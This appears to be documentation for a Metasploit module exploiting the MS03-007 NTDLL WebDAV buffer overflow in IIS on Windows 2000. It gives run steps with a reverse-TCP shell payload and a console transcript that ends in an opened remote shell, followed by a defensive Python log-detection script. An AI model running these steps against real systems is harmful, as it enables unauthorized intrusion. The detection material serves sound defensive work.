## Vulnerable Application

This module exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against SP0 to SP3.

This module has been tested successfully on:

* Windows 2000 Professional SP0 (EN)
* Windows 2000 Professional SP0 (FI)
* Windows 2000 Professional SP0 (NL)
* Windows 2000 Professional SP0 (TR)
* Windows 2000 Professional SP1 (AR)
* Windows 2000 Professional SP1 (CZ)
* Windows 2000 Professional SP1 (EN)
* Windows 2000 Professional SP2 (EN)
* Windows 2000 Professional SP2 (FR)
* Windows 2000 Professional SP2 (PT)
* Windows 2000 Professional SP3 (EN)
* Windows 2000 Server SP0 (DE)
* Windows 2000 Server SP0 (EN)
* Windows 2000 Server SP0 (ES)
* Windows 2000 Server SP0 (FR)
* Windows 2000 Server SP0 (HU)
* Windows 2000 Server SP0 (NL)
* Windows 2000 Server SP0 (PT)
* Windows 2000 Server SP0 (TR)
* Windows 2000 Server SP1 (EN)
* Windows 2000 Server SP1 (SE)
* Windows 2000 Server SP2 (EN)
* Windows 2000 Server SP2 (RU)
* Windows 2000 Server SP3 (DE)
* Windows 2000 Server SP3 (IT)

## Verification Steps

1. `use exploit/windows/iis/ms03_007_ntdll_webdav`
1. `set RHOSTS [IP]`
1. `set PAYLOAD windows/shell/reverse_tcp`
1. `set LHOST [IP]`
1. `run`

## Options

## Scenarios

### Windows 2000 Professional SP1 (EN)

```
msf6 > use exploit/windows/iis/ms03_007_ntdll_webdav
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set rhosts 192.168.200.195
rhosts => 192.168.200.195
msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > check
[+] 192.168.200.195:80 - The target is vulnerable. We've hit a server error (exception)
msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Trying return address 0x004e004f (1 / 88)...
[-] Attempt failed: Connection reset by peer
[*] Checking if IIS is back up after a failed attempt...
[-] Connection failed (1 of 20)...
[-] Connection failed (2 of 20)...
[-] Connection failed (3 of 20)...
[-] Connection failed (4 of 20)...
[*] Trying return address 0x00ce004f (2 / 88)...
[-] Attempt failed: Connection reset by peer
[*] Checking if IIS is back up after a failed attempt...
[-] Connection failed (1 of 20)...
[-] Connection failed (2 of 20)...
[*] Trying return address 0x00ce0041 (3 / 88)...
[-] Attempt failed: Connection reset by peer
[*] Checking if IIS is back up after a failed attempt...
[-] Connection failed (1 of 20)...
[-] Connection failed (2 of 20)...
[-] Connection failed (3 of 20)...
[-] Connection failed (4 of 20)...
[*] Trying return address 0x00430041 (4 / 88)...
[-] Attempt failed: Connection reset by peer
[*] Checking if IIS is back up after a failed attempt...
[-] Connection failed (1 of 20)...
[-] Connection failed (2 of 20)...
[*] Trying return address 0x00b40041 (5 / 88)...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.195
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1066) at 2022-07-07 06:13:21 -0400

Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----

C:\WINNT\system32>ver
ver

Microsoft Windows 2000 [Version 5.00.2195]

C:\WINNT\system32>
```
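On the defensive side, the behaviour shown above (a WebDAV SEARCH request followed by the IIS process dropping connections, repeated once per return address tried) can be spotted in the IIS W3C extended logs. The following is an added example, not code from the Metasploit module or this page: it parses constructed log lines using the standard `#Fields:` directive and flags SEARCH requests whose path is far longer than any legitimate WebDAV query. The length and burst thresholds are assumptions chosen for illustration, not values taken from the page.

```python
"""Flag oversized WebDAV SEARCH requests in IIS W3C extended logs (added example)."""
from collections import defaultdict

URI_LEN_THRESHOLD = 4096   # assumption: real WebDAV SEARCH paths stay far below this
BURST_THRESHOLD = 3        # assumption: this many flagged requests from one client is a burst


def parse_w3c(text):
    """Yield one dict per data line, naming columns from the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ", len(fields) - 1)
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def find_search_anomalies(text, uri_len=URI_LEN_THRESHOLD):
    """Return (per-client count of oversized SEARCH requests, flagged rows)."""
    flagged = []
    per_client = defaultdict(int)
    for row in parse_w3c(text):
        if row.get("cs-method", "").upper() != "SEARCH":
            continue
        if len(row.get("cs-uri-stem", "")) >= uri_len:
            flagged.append(row)
            per_client[row["c-ip"]] += 1
    return dict(per_client), flagged


# Constructed sample log: one benign SEARCH, then three oversized ones from a single client
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem sc-status",
    "2022-07-07 10:13:01 10.0.0.5 GET /default.htm 200",
    "2022-07-07 10:13:02 10.0.0.5 SEARCH /docs/ 207",
    "2022-07-07 10:13:05 10.0.0.9 SEARCH /" + "A" * 65000 + " 500",
    "2022-07-07 10:13:09 10.0.0.9 SEARCH /" + "B" * 65000 + " 500",
    "2022-07-07 10:13:14 10.0.0.9 SEARCH /" + "C" * 65000 + " 500",
])

if __name__ == "__main__":
    counts, rows = find_search_anomalies(SAMPLE_LOG)
    for ip, n in counts.items():
        tag = "burst" if n >= BURST_THRESHOLD else "single"
        print(f"{ip}: {n} oversized SEARCH request(s) [{tag}]")
```

Note that a request which crashes the IIS process may never reach the log at all, so a gap in logging around the same time, together with the service restarting, is the complementary signal to look for.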